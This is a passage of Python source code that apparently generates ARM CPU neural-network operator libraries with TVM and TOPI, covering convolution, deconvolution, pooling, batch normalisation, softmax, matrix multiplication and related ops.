c4][0][0], tag=\"injective\")\n out_tensor = TopiActivation(out_tensor, activation_type)\n if impl_dtype != dtype:\n out_tensor = AsType(out_tensor, dtype)\n\n # create schedule\n if use_arm32:\n s = tvm.create_schedule(out_tensor.op)\n else:\n s = schedule_conv2d_nchw_arm_cpu_deconv(cfg, [out_tensor])\n\n attr = [batch, in_channel, in_height, in_width, out_channel, in_tensor, kernel_tensor]\n if has_bias: attr.append(bias)\n attr.append(out_tensor)\n tensor_list = attr\n\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef ConvVar(device=\"llvm\", lib_path=\"./\", optype=None,\\\n ndim=None, layout=None, dtype=None, kernels=None,\\\n strides=None, pad=None, dilations=None,\\\n hasbias=None, activation_type=None,\\\n config_entity=None, impl_dtype=None, channel_multiplier=None,\\\n use_arm32=False, cfg=None):\n '''\n convolution\n Args:\n device:\n lib_path:\n optype:\n ndim:\n layout:\n dtype:\n kernels:\n strides:\n pad:\n dilations:\n hasbias:\n activationType:\n configEntity:\n impl_dtype:\n channel_multiplier:\n use_arm32:\n cfg:\n\n Returns:\n 
'''\n use_depthwise = optype == 'ConvolutionDepthwise'\n use_deconv = optype == 'Deconvolution'\n use_deconv_depthwise = optype == 'DeConvolutionDepthwise'\n has_bias = hasbias\n\n ow = 1 if cfg is None else cfg['VW']\n oh = 1 if cfg is None else cfg['VH']\n oc = 1 if cfg is None else cfg['VC']\n kh, kw = kernels\n op_name = \"%s_ndim%d_%s_k%d_s%d_p%d%d%d%d_d%d_act%d_vc%d_vh%d_vw%d_hasbias%d\" % ( \\\n map_conv[optype], ndim, dtype, \\\n kh, strides[0], pad[0], pad[1], pad[2], pad[3], dilations[0], \\\n activation_enum_map[activation_type], oc, oh, ow, hasbias)\n batch = tvm.var(\"batch\")\n in_channel = tvm.var(\"in_channel\")\n in_height, in_width = tvm.var(\"in_height\"), tvm.var(\"in_width\")\n pad_up, pad_down, pad_left, pad_right = pad\n opname = op_name\n\n print(\"Conv\", opname, config_entity)\n\n if impl_dtype is None:\n impl_dtype = dtype\n\n if use_depthwise:\n multiplier = channel_multiplier\n out_channel = in_channel * multiplier\n elif use_deconv_depthwise:\n multiplier = channel_multiplier\n out_channel = in_channel * multiplier\n else:\n out_channel = tvm.var(\"out_channel\")\n\n # define placeholder\n input_tensor = in_tensor = tvm.placeholder((batch, in_channel, in_height, in_width), dtype=dtype, name='in_tensor')\n\n if use_depthwise:\n temp_tensor = kernel_tensor = tvm.placeholder((in_channel, multiplier, kh, kw), dtype=dtype,\\\n name='kernel_tensor')\n elif use_deconv:\n temp_tensor = kernel_tensor = tvm.placeholder((in_channel, out_channel, kh, kw), dtype=dtype,\\\n name='kernel_tensor')\n elif use_deconv_depthwise:\n temp_tensor = kernel_tensor = tvm.placeholder((in_channel, multiplier, kh, kw), dtype=dtype,\\\n name='kernel_tensor')\n else:\n temp_tensor = kernel_tensor = tvm.placeholder((out_channel, in_channel, kh, kw), dtype=dtype,\\\n name='kernel_tensor')\n if has_bias:\n bias = tvm.placeholder((out_channel,), dtype=dtype, name='bias')\n bias1 = topi.reshape(bias, (out_channel, 1, 1))\n\n if impl_dtype != dtype:\n input_tensor = 
AsType(input_tensor, impl_dtype)\n temp_tensor = AsType(temp_tensor, impl_dtype)\n if has_bias:\n bias1 = AsType(bias1, impl_dtype)\n\n # define compute & schedule\n if pad_up != pad_down or pad_left != pad_right:\n input_tensor = topi.nn.pad(input_tensor, [0, 0, pad_up, pad_left], [0, 0, pad_down, pad_right], name='data_pad')\n padding = 0, 0\n else:\n padding = pad_up, pad_left\n if use_depthwise:\n cfg1 = (True, 1, 1, 1) if cfg is None else (True, cfg[\"tile_oh\"], cfg[\"tile_ow\"], cfg[\"tile_co\"])\n out_tensor = _depthwise_spatial_pack(cfg1, input_tensor, temp_tensor, strides, padding, dilations,\\\n out_dtype=impl_dtype)\n elif use_deconv:\n\n def GetInput(input_tensor, temp_tensor, padding):\n _, out_c, filter_h, filter_w = temp_tensor.shape\n if out_c is None:\n print(\"temp_tensor.shape err\")\n stride_h, stride_w = strides\n # dilate stage\n dilated_input = topi.nn.dilate(input_tensor, [1, 1, stride_h, stride_w],\n name='DilatedInput')\n # padding stage\n fpad_top, fpad_left, fpad_bottom, fpad_right = topi.nn.get_pad_tuple(padding, (\n filter_h, filter_w))\n bpad_top = filter_h - 1 - fpad_top\n bpad_bottom = filter_h - 1 - fpad_bottom\n bpad_left = filter_w - 1 - fpad_left\n bpad_right = filter_w - 1 - fpad_right\n padded_input = topi.nn.pad(dilated_input, \\\n [0, 0, bpad_top, bpad_left], \\\n [0, 0, bpad_bottom, bpad_right], \\\n name='PaddedInput')\n return padded_input\n\n special_deconv = kh == 2 and kw == 2 and strides[0] == 2 and strides[1] == 2\n # special_deconv = False\n if special_deconv:\n out_tensor = OptimalOut(input_tensor, temp_tensor, in_channel)\n else:\n out_tensor = BaseImplementation(input_tensor, temp_tensor, GetInput, layout, padding)\n elif use_deconv_depthwise:\n def GetInput(input_tensor, temp_tensor, padding):\n _, out_c, filter_h, filter_w = temp_tensor.shape\n if out_c is None:\n print(\"temp_tensor.shape err\")\n stride_h, stride_w = strides\n # dilate stage\n dilated_input = topi.nn.dilate(input_tensor, [1, 1, stride_h, 
stride_w],\n name='DilatedInput')\n # padding stage\n fpad_top, fpad_left, fpad_bottom, fpad_right = topi.nn.get_pad_tuple(padding, (\n filter_h, filter_w))\n bpad_top = filter_h - 1 - fpad_top\n bpad_bottom = filter_h - 1 - fpad_bottom\n bpad_left = filter_w - 1 - fpad_left\n bpad_right = filter_w - 1 - fpad_right\n padded_input = topi.nn.pad(dilated_input, \\\n [0, 0, bpad_top, bpad_left], \\\n [0, 0, bpad_bottom, bpad_right], \\\n name='PaddedInput')\n return padded_input\n\n temp_tensor = topi.flip(temp_tensor, axis=-1)\n temp_tensor = topi.flip(temp_tensor, axis=-2)\n out_tensor = topi.nn.depthwise_conv2d_nchw(GetInput(input_tensor, temp_tensor, padding), temp_tensor, (1, 1), \\\n padding, (1, 1), out_dtype=input_tensor.dtype)\n else:\n cfg1 = (True, 1, 1, 1) if cfg is None else (True, cfg[\"tile_oh\"], cfg[\"tile_ow\"], cfg[\"tile_co\"])\n out_tensor = _conv_spatial_pack_asm(cfg1, input_tensor, temp_tensor, strides, padding, dilations,\\\n out_dtype=impl_dtype)\n\n if has_bias:\n out_tensor = tvm.compute(out_tensor.shape, lambda n, co, h, w: out_tensor[n, co, h, w] + bias1[co][0][0],\\\n tag=\"injective\")\n out_tensor = TopiActivation(out_tensor, activation_type)\n if impl_dtype != dtype:\n out_tensor = AsType(out_tensor, dtype)\n\n # create schedule\n if use_arm32:\n s = tvm.create_schedule(out_tensor.op)\n elif use_depthwise:\n s = schedule_depthwise_conv2d_nchw_arm(cfg, [out_tensor])\n elif use_deconv:\n if special_deconv:\n s = tvm.create_schedule([out_tensor.op])\n else:\n s = topi.generic.schedule_conv2d_nchw([out_tensor])\n elif use_deconv_depthwise:\n s = tvm.create_schedule([out_tensor.op])\n else:\n s = schedule_conv2d_nchw_arm_cpu([out_tensor])\n\n # generate lib\n attr = [batch, in_channel, in_height, in_width, out_channel, in_tensor, kernel_tensor]\n tensor_list = [*attr, bias, out_tensor] if has_bias else [*attr, out_tensor]\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef BaseImplementation(input_tensor, temp_tensor, get_input, 
layout, padding):\n temp_tensor = topi.flip(temp_tensor, axis=-1)\n temp_tensor = topi.flip(temp_tensor, axis=-2)\n temp_tensor = topi.transpose(temp_tensor, axes=(1, 0, 2, 3))\n out_tensor = topi.nn.conv2d(get_input(input_tensor, temp_tensor, padding), temp_tensor, (1, 1), padding, (1, 1),\n layout=layout, out_dtype=input_tensor.dtype)\n return out_tensor\n\n\ndef OptimalOut(input_tensor, temp_tensor, in_channel):\n '''\n deconv compute\n Args:\n input_tensor:\n temp_tensor:\n in_channel:\n\n Returns:\n '''\n temp_tensor = topi.transpose(temp_tensor, axes=(1, 0, 2, 3))\n out_shape = []\n for i in range(len(input_tensor.shape)):\n if i == 0:\n out_shape.append(input_tensor.shape[i])\n continue\n if i == 1:\n out_shape.append(temp_tensor.shape[0])\n continue\n out_shape.append(2 * input_tensor.shape[i])\n rc = tvm.reduce_axis((0, in_channel), name='rc')\n return tvm.compute(out_shape, lambda i, j, k, l:\\\n tvm.sum(input_tensor[i, rc, k // 2, l // 2].astype(input_tensor.dtype) *\\\n temp_tensor[j, rc, k % 2, l % 2].astype(input_tensor.dtype), axis=[rc]))\n\n\ndef Concat(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, input_num=None, axis=None):\n '''\n concat\n Args:\n device:\n lib_path:\n all_tensors:\n ndim:\n dtype:\n input_num:\n axis:\n\n Returns:\n '''\n if axis >= ndim:\n return\n shapes = []\n for i in range(input_num):\n shape = []\n for j in range(ndim):\n if j == axis:\n shape.append(tvm.var(\"axis\" + str(i)))\n else:\n shape.append(tvm.var(\"n\" + str(j)))\n shapes.append(shape)\n in_tensor = [tvm.placeholder(shape, dtype=dtype, name='in_tensor%d' % i) for i, shape in enumerate(shapes)]\n opname = \"Concat_ndim%d_%s_input_num%d_axis%d\" % (ndim, dtype, input_num, axis)\n print(opname)\n\n # define compute\n out_tensor = topi.concatenate(tuple(in_tensor), axis)\n tensor_list = in_tensor + [out_tensor]\n if ndim < 5:\n s = topi.generic.schedule_concatenate(out_tensor)\n else:\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, 
device, opname, lib_path)\n\n\ndef Activation(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, optype=None):\n '''\n activation\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n optype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"Activation_ndim%d_%s_%s\" % (ndim, dtype, optype)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = TopiActivation(in_tensor, optype, memcpy=True)\n tensor_list = [in_tensor, out_tensor]\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef BatchNorm(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, optype=False, axis=None):\n '''\n batchnorm\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n optype:\n axis:\n\n Returns:\n '''\n if axis >= ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n channel = shape[axis]\n eps = tvm.var(\"epsilon\", dtype=\"float32\")\n opname = optype + (\"_ndim%d_%s_axis%d\" % (ndim, dtype, axis))\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n mean = tvm.placeholder((channel,), dtype=dtype, name='mean')\n variance = tvm.placeholder((channel,), dtype=dtype, name='var')\n scale = tvm.placeholder((channel,), dtype=dtype, name='scale')\n offset = tvm.placeholder((channel,), dtype=dtype, name='offset')\n\n variance_sqrt = tvm.compute((channel,), lambda i: tvm.sqrt(variance[i] + eps.astype(dtype)))\n if optype == \"TFBatchNorm\":\n out_tensor = tvm.compute(shape, lambda *idx: ((in_tensor[idx] - mean[idx[axis]]) / variance_sqrt[idx[axis]]) *\\\n scale[idx[axis]] + offset[idx[axis]])\n tensor_list = [eps, in_tensor, scale, offset, mean, variance, out_tensor]\n elif optype == \"CaffeBatchNorm\":\n out_tensor = tvm.compute(shape, lambda *idx: (in_tensor[idx] - mean[idx[axis]]) / variance_sqrt[idx[axis]])\n tensor_list = [eps, in_tensor, mean, variance, out_tensor]\n 
elif optype == \"CaffeScale\":\n out_tensor = tvm.compute(shape, lambda *idx: in_tensor[idx] * scale[idx[axis]] + offset[idx[axis]])\n tensor_list = [in_tensor, scale, offset, out_tensor]\n elif optype == \"TFBiasAdd\":\n out_tensor = tvm.compute(shape, lambda *idx: in_tensor[idx] + offset[idx[axis]])\n tensor_list = [in_tensor, offset, out_tensor]\n else:\n raise RuntimeError(\"no support for {}\".format(optype))\n\n # define schedule & generate lib\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Pooling(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, pooling_mode=None, kernel=None, stride=None, pad=None, caffe_mode=None,\n use_global=False):\n '''\n pooling\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n pooling_mode:\n kernel:\n stride:\n pad:\n caffe_mode:\n use_global:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(0, ndim)]\n layout = 'NCHW'\n if use_global:\n opname = \"GlobalPooling_ndim%d_%s_%s\" % (ndim, dtype, pooling_mode)\n else:\n kernel_h, kernel_w = kernel\n stride_h, stride_w = stride\n pad_up, pad_down, pad_left, pad_right = pad\n if pad_up == 0 and pad_down == 0 and pad_left == 0 and pad_right == 0 and caffe_mode:\n caffe_mode = False\n opname = \"Pooling_ndim%d_%s_%s_kernel%d%d_stride%d%d_pad%d%d%d%d%s\" \\\n % (ndim, dtype, pooling_mode, kernel_h, kernel_w, stride_h, stride_w,\n pad_up, pad_down, pad_left, pad_right, \"_caffe\" if caffe_mode else \"\")\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n if use_global:\n out_tensor = topi.nn.global_pool(in_tensor, pool_type=pooling_mode, layout=layout)\n sch = topi.generic.schedule_adaptive_pool(out_tensor)\n else:\n out_tensor = topi.nn.pool(in_tensor,\n kernel=(kernel_h, kernel_w),\n stride=(stride_h, stride_w),\n padding=(pad_up, pad_left, pad_down, pad_right),\n pool_type=pooling_mode,\n ceil_mode=False,\n layout=layout,\n count_include_pad=False)\n 
sch = topi.generic.schedule_pool(out_tensor, layout)\n tensor_list = [in_tensor, out_tensor]\n Genlib(sch, tensor_list, device, opname, lib_path, print_lower=False)\n\n\ndef Eltwise(device=\"llvm\", lib_path=\"./\",\n ndim_a=None, ndim_b=None, dtype=None, mode=None):\n '''\n eltwise\n Args:\n device:\n lib_path:\n ndim_a:\n ndim_b:\n dtype:\n mode:\n\n Returns:\n '''\n ndim_max = max(ndim_a, ndim_b)\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim_max)]\n shape_b1 = [dim if i == 1 else 1 for i, dim in enumerate(shape)]\n shape_a = shape[ndim_max - ndim_a:] if ndim_a else (1,)\n shape_b = shape[ndim_max - ndim_b:] if ndim_b == ndim_a else shape_b1 if ndim_b == 1 else (1,)\n opname = \"Eltwise_%s_ndimA%d_ndimB%d_%s\" % (mode, ndim_a, ndim_b, dtype)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape_a, dtype=dtype, name='in_tensor')\n b_tensor = tvm.placeholder(shape_b, dtype=dtype, name='b_tensor')\n\n topi_funs = {\n 'add': topi.add,\n 'subtract': topi.subtract,\n 'multiply': topi.multiply,\n 'divide': topi.divide,\n 'maximum': topi.maximum,\n 'minimum': topi.minimum,\n }\n\n out_tensor = topi_funs[mode](in_tensor, b_tensor)\n tensor_list = [in_tensor, b_tensor, out_tensor]\n s = topi.generic.schedule_elemwise(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Softmax(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, axis=None):\n '''\n softmax\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n axis:\n\n Returns:\n '''\n if axis >= ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"Softmax_ndim%d_%s_axis%s\" % (ndim, dtype, axis)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = topi.nn.softmax(in_tensor, axis)\n tensor_list = [in_tensor, out_tensor]\n s = topi.generic.schedule_elemwise(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Resize(device=\"llvm\", lib_path=\"./\",\n 
ndim=None, dtype=None, method=None, align_corners=None):\n '''\n resize\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n method:\n align_corners:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n new_height = tvm.var(\"newHeight\")\n new_width = tvm.var(\"new_width\")\n opname = \"Resize_ndim%d_%s_%s_%s\" % (ndim, dtype, method, \"Align\" if align_corners else \"NotAlign\")\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = resize(in_tensor, [new_height, new_width], align_corners=align_corners, method=method)\n tensor_list = [new_height, new_width, in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Mean(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, axis=None, keep_dims=None):\n '''\n mean\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n axis:\n keepDims:\n\n Returns:\n '''\n if axis[-1] >= ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n axis_str = \"\"\n for dim in axis:\n axis_str += str(dim)\n opname = \"Mean_ndim%d_%s_axis%s_%s\" % (ndim, dtype, axis_str, \"keepDims\" if keep_dims else \"notkeepDims\")\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n c_shape = shape[:]\n reduced_num = 1\n for dim in axis:\n c_shape[dim] = 1\n reduced_num *= shape[dim]\n\n def _ComputeSum(*b_idx):\n reduce_axis = [tvm.reduce_axis((0, shape[dim])) for dim in axis]\n a_idx = list(b_idx)\n for i, dim in enumerate(axis):\n a_idx[dim] = reduce_axis[i]\n a_idx = tuple(a_idx)\n return tvm.sum(in_tensor[a_idx], axis=reduce_axis)\n\n out_tensor = tvm.compute(c_shape, _ComputeSum)\n out_tensor = tvm.compute(c_shape, lambda *i: out_tensor(*i) / reduced_num)\n if not keep_dims:\n out_tensor = topi.squeeze(out_tensor, axis)\n\n # define schedule & generate lib\n tensor_list = [in_tensor, out_tensor]\n s = 
tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef CaffeCrop(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, axis=None):\n '''\n caffe crop op\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n axis:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(axis)]\n shape_a = shape[:]\n shape_b = shape[:]\n offsets = []\n for i in range(axis, ndim):\n shape_a.append(tvm.var(\"nA\" + str(i)))\n shape_b.append(tvm.var(\"nB\" + str(i)))\n offsets.append(tvm.var(\"offset\" + str(i)))\n opname = \"CaffeCrop_ndim%d_%s_axis%d\" % (ndim, dtype, axis)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape_a, dtype=dtype, name='in_tensor')\n b_tensor = tvm.placeholder(shape_b, dtype=dtype, name='b_tensor')\n begin = [0] * axis + offsets\n end = shape_a[:]\n for i in range(axis, len(shape_a)):\n end[i] = offsets[i - axis] + shape_b[i]\n shape_c = [end[i] - begin[i] for i in range(ndim)]\n\n def _Compute(*C_idx):\n a_idx = [idx + begin[i] for i, idx in enumerate(list(C_idx))]\n a_idx = tuple(a_idx)\n return in_tensor[a_idx]\n\n out_tensor = tvm.compute(shape_c, _Compute)\n tensor_list = offsets + [in_tensor, b_tensor, out_tensor]\n\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef FullConnection(device=\"llvm\", lib_path=\"./\",\n ndim_a=None, dtype=None, has_bias=None):\n '''\n full connection\n Args:\n device:\n lib_path:\n ndim_a:\n dtype:\n hasBias:\n\n Returns:\n '''\n n_dim, ci, h_dim, kernel_tensor = (tvm.var(\"n_dim\"), tvm.var(\"out_tensor\"), tvm.var(\"h_dim\"), \\\n tvm.var(\"kernel_tensor\"))\n co = tvm.var(\"co\")\n if ndim_a == 4:\n shape_a = (n_dim, ci, h_dim, kernel_tensor)\n chw = ci * h_dim * kernel_tensor\n else:\n shape_a = (n_dim, ci)\n chw = ci\n shape_w = (co, chw)\n opname = \"FullConnection_ndimA%d_%s_%s\" % (ndim_a, dtype, \"hasBias\" if has_bias else \"notHasBias\")\n is_var = True\n vh, vw, vc = 1, 1, 1\n 
print(opname)\n\n in_tensor = tvm.placeholder(shape_a, dtype=dtype, name='in_tensor')\n kernel_tensor = tvm.placeholder(shape_w, dtype=dtype, name='kernel_tensor')\n input_tensor = topi.reshape(in_tensor, (n_dim, chw)) if len(shape_a) == 4 else in_tensor\n\n out_tensor = _matmul_spatial_pack_asm((is_var, 0, ci, vh, vw, vc), input_tensor, kernel_tensor, \\\n layout='NC', out_dtype=dtype)\n if has_bias:\n bias = tvm.placeholder((co,), dtype=dtype, name='bias')\n out_tensor = tvm.compute((n_dim, co), lambda n, co: out_tensor[n, co] + bias[co], tag='injective')\n\n tensor_list = [in_tensor, kernel_tensor, bias, out_tensor] if has_bias else [in_tensor, kernel_tensor, out_tensor]\n cfg = {'is_var': is_var, 'is_transpose': 0, 'core_id': 0, 'CI': ci, 'VH': vh, 'VW': vw, 'VC': vc}\n s = _matmul_schedule_asm(cfg, [out_tensor])\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Power(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None):\n '''\n power\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n power = tvm.var(\"power\", dtype=\"float32\")\n scale = tvm.var(\"scale\", dtype=\"float32\")\n shift = tvm.var(\"shift\", dtype=\"float32\")\n opname = \"Power_ndim%d_%s\" % (ndim, dtype)\n print(opname)\n\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = tvm.compute(shape, lambda *i: tvm.power(in_tensor[i] * scale.astype(in_tensor.dtype) + \\\n shift.astype(in_tensor.dtype), \\\n power.astype(in_tensor.dtype)))\n tensor_list = [power, scale, shift, in_tensor, out_tensor]\n\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef CaffePReLU(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, channel_shared=None):\n '''\n caffe prelu\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n channel_shared:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n channel = 1 if channel_shared else 
shape[1]\n opname = \"CaffePReLU_ndim%d_%s_%s\" % (ndim, dtype,\n \"channelShared\" if channel_shared else \"channelNotShared\")\n print(opname)\n\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n slope = tvm.placeholder((channel,), dtype=dtype, name='slope')\n if channel_shared:\n out_tensor = tvm.compute(shape, lambda *idx: tvm.if_then_else(in_tensor[idx] >= 0, in_tensor[idx],\\\n in_tensor[idx] * slope[0]))\n else:\n out_tensor = tvm.compute(shape, lambda *idx: tvm.if_then_else(in_tensor[idx] >= 0, in_tensor[idx],\\\n in_tensor[idx] * slope[idx[1]]))\n\n tensor_list = [in_tensor, slope, out_tensor]\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Pad(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, paddingmode=None):\n '''\n pad\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n paddingmode:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n pad_before = [tvm.var(\"pad_before\" + str(i)) for i in range(ndim)]\n pad_after = [tvm.var(\"pad_after\" + str(i)) for i in range(ndim)]\n pad_before_const = [0, 0] + pad_before[2:]\n pad_after_const = [0, 0] + pad_after[2:]\n paddings = [None] * 2 * len(shape)\n paddings[0:: 2] = pad_before\n paddings[1:: 2] = pad_after\n pad_value = 0\n opname = \"Pad_ndim%d_%s_%s\" % (ndim, dtype, paddingmode)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n if paddingmode == \"CONSTANT\":\n out_tensor = topi.nn.pad(in_tensor, pad_before_const, pad_after_const, pad_value=pad_value, name='out_tensor')\n else:\n out_tensor = mirror_pad(in_tensor, pad_before_const, pad_after_const, mode=paddingmode, name='out_tensor')\n tensor_list = paddings + [in_tensor, out_tensor]\n def SchedulePad(inputs):\n s = tvm.create_schedule(inputs.op)\n if s[inputs].op.axis:\n s[inputs].parallel(s[inputs].op.axis[1])\n return s\n\n s = SchedulePad(out_tensor)\n Genlib(s, tensor_list, device, opname, 
lib_path)\n\n\ndef MatMul(device=\"llvm\", lib_path=\"./\",\n ndim_a=None, ndim_b=None, dtype=None, transpose_a=None, transpose_b=None):\n '''\n matmul\n Args:\n device:\n lib_path:\n ndim_a:\n ndim_b:\n dtype:\n transpose_a:\n transpose_b:\n\n Returns:\n '''\n m, k, n_dim = tvm.var(\"m\"), tvm.var(\"k\"), tvm.var(\"n_dim\")\n a_shape = (m, k) if not transpose_a else (k, m)\n b_shape = (k, n_dim) if not transpose_b else (n_dim, k)\n opname = \"MatMul_ndimA%d_ndimB%d_%s_%d_%d\" % (ndim_a, ndim_b, dtype, transpose_a, transpose_b)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(a_shape, dtype=dtype, name='in_tensor')\n b_tensor = tvm.placeholder(b_shape, dtype=dtype, name='b_tensor')\n out_tensor = topi.matmul(in_tensor, b_tensor, transpose_a, transpose_b)\n tensor_list = [in_tensor, b_tensor, out_tensor]\n s = topi.generic.schedule_elemwise(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Stack(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, input_num=None, axis=None):\n '''\n stack\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n input_num:\n axis:\n\n Returns:\n '''\n if axis > ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n shapes = [shape] * input_num\n in_tensor = [tvm.placeholder(shape, dtype=dtype, name='in_tensor%d' % i) for i, shape in enumerate(shapes)]\n opname = \"Stack_ndim%d_%s_input_num%d_axis%d\" % (ndim, dtype, input_num, axis)\n print(opname)\n\n input_tensor = [topi.expand_dims(ai, axis) for ai in in_tensor]\n out_tensor = topi.concatenate(tuple(input_tensor), axis=axis)\n tensor_list = in_tensor + [out_tensor]\n if ndim < 4:\n s = topi.generic.schedule_concatenate(out_tensor)\n else:\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef ArgMax(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None, axis=None, keep_dims=None, top_k=None,\n out_dtype=None):\n '''\n argmax\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n 
axis:\n keepDims:\n top_k:\n out_dtype:\n\n Returns:\n '''\n if axis >= ndim:\n return\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"ArgMax_ndim%d_%s_axis%d_%s_top%d_%s\" \\\n % (ndim, dtype, axis, \"keepDims\" if keep_dims else \"notKeepDims\", top_k, out_dtype)\n print(opname)\n\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n out_tensor = topi.argmax(in_tensor, axis=axis, keepdims=keep_dims)\n out_tensor = AsType(out_tensor, out_dtype)\n tensor_list = [in_tensor, out_tensor]\n s = tvm.create_schedule(out_tensor.op)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Exp(device=\"llvm\", lib_path=\"./\",\n ndim=None, dtype=None):\n '''\n exp\n Args:\n device:\n lib_path:\n ndim:\n dtype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"Exp_ndim%d_%s\" % (ndim, dtype)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=dtype, name='in_tensor')\n if 'int' in dtype:\n input_tensor = AsType(in_tensor, 'float32')\n out_tensor = topi.exp(input_tensor)\n out_tensor = AsType(out_tensor, in_tensor.dtype)\n else:\n out_tensor = topi.exp(in_tensor)\n tensor_list = [in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef Cast(device=\"llvm\", lib_path=\"./\",\n ndim=None, src_dtype=None, dst_dtype=None):\n '''\n cast\n Args:\n device:\n lib_path:\n ndim:\n src_dtype:\n dst_dtype:\n\n Returns:\n '''\n shape = [tvm.var(\"n\" + str(i)) for i in range(ndim)]\n opname = \"Cast_ndim%d_%s_%s\" % (ndim, src_dtype, dst_dtype)\n print(opname)\n\n # define compute\n in_tensor = tvm.placeholder(shape, dtype=src_dtype, name='in_tensor')\n out_tensor = topi.cast(in_tensor, dst_dtype)\n tensor_list = [in_tensor, out_tensor]\n s = topi.generic.schedule_injective(out_tensor)\n Genlib(s, tensor_list, device, opname, lib_path)\n\n\ndef ExpandDims(device=\"llvm\", lib_path=\"./\",\n ndim=None, 
